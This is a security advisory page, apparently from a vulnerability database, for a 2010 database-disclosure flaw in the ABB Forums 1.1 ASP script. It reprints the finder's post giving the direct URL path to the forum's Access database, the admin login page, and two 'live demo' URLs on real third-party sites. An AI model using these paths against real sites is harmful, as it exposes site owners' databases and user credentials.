ABB Forums version 1.1 database disclosure

2010-01-11 / 2010-01-12
Credit: ViRuSMaN
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== [?] ABB v1.1 Forum Remote Database Disclosure Vulnerability ============================================================================== [?] Script: [ ABB Forums ] [?] Language: [ ASP ] [?] Site page: [ Possede de tres nombreuses options d administration et de configuration ] [?] Download: [ http://www.comscripts.com/jump.php?action=script&id=506 ] [?] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ] [?] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ] [?] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== [?] http://[target].com/[path]/fpdb/abb.mdb ===[ Admin Login ]=== [?] http://[target].com/[path]/admin.asp ===[ Live Demo ]=== [?] http://www.lesensdelexistence.fr/forum/fpdb/abb.mdb [?] http://www.reflex-deutsch.com/Forum/fpdb/abb.mdb Author: ViRuSMaN <- ########################################################################### ________________________________ Keep your friends updated? even when you?re not signed in.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_5:092010>

References:

http://xforce.iss.net/xforce/xfdb/55505
http://www.exploit-db.com/exploits/11096
http://packetstormsecurity.org/1001-exploits/abbforums-dislclose.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top